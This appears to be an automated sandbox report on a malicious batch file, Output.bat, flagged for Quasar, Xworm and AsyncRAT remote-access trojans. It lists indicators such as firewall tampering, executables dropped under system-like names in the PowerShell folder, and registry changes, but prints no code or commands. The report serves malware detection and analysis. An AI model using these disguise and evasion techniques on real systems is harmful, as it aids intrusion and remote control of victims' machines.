Analysis Overview
SHA256
3d25b09ab5a16a6b49a7394175b3bce37ba2ae9ce8771408b05280b1bd14b036
Threat Level: Known bad
The file Output.bat was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Detect Xworm Payload
Modifies firewall policy service
Quasar RAT
Quasar payload
Xworm
AsyncRat
Async RAT payload
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Checks computer location settings
Looks up external IP address via web service
Enumerates connected drives
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Checks processor information in registry
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: LoadsDriver
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-29 20:11
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-29 20:11
Reported
2024-06-29 20:29
Platform
win10v2004-20240508-en
Max time kernel
1049s
Max time network
1048s
Command Line
Signatures
AsyncRat
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{1A280F62-479D-4C75-BCF5-F49586D9CB43} = "v2.30|Action=Block|Active=TRUE|Dir=In|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{46180BB6-C69C-4461-B788-35D602E3D2C8} = "v2.30|Action=Block|Active=TRUE|Dir=Out|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" | C:\Windows\system32\svchost.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\PolicyVersion = "542" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|D=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\|PFN=Microsoft.MicrosoftEdge.Stable_92.0.902.67_neutral__8wekyb3d8bbwe|" | C:\Windows\system32\svchost.exe | N/A |
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\B: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\svchost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\wdi\LogFiles\StartupInfo\S-1-5-21-1337824034-2731376981-3755436523-1000_StartupInfo3.xml | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\SRU\SRU.log | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\SRU\SRUDB.jfm | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{518e6335-aaed-4471-8c1b-13da3e76dbf8}\snapshot.etl | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\SRU\SRUDB.dat | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\WDI\BootPerformanceDiagnostics_SystemData.bin | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{518e6335-aaed-4471-8c1b-13da3e76dbf8}\snapshot.etl | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\SRU\SRU.chk | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\WDI\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\S-1-5-21-1337824034-2731376981-3755436523-1000_UserData.bin | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\NDF\{E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC}-temp-06292024-2013.etl | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\NDF\{E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC}-temp-06292024-2013.etl | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnostics-Networking%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\INF\netsstpa.PNF | C:\Windows\Explorer.EXE | N/A |
| File created | C:\Windows\INF\netrasa.PNF | C:\Windows\Explorer.EXE | N/A |
| File created | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk | C:\Windows\System32\svchost.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\svchost.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Windows\Explorer.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = 82079ef260cada01 | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E3FB4E05F" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\RAS AutoDial | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\RAS AutoDial\Default | C:\Windows\System32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = cc2ee48762cada01 | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecision = "0" | C:\Windows\system32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = caabb54d61cada01 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61 | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionReason = "1" | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133641655111398851" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PTT = "133641655992145014" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PCT = "133641655787268193" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ICT = "133641655754612850" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ITT = "133641655800705768" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PCT = "133641655955094805" | C:\Windows\system32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m = f401000040010000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 | C:\Windows\system32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1 | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133641655285734553" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ICT = "133641655790549625" | C:\Windows\system32\svchost.exe | N/A |
